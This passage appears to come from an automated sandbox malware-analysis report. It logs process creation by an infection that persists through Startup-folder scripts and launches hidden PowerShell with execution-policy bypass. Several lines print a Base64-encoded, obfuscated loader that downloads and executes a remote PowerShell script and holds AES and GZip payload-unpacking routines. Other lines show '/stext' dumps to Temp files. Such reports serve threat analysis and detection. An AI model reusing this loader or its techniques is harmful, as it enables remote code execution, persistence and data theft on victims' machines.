hYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\didgwgwgoqljydvgxmqznirblkkzsrxppo"
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3R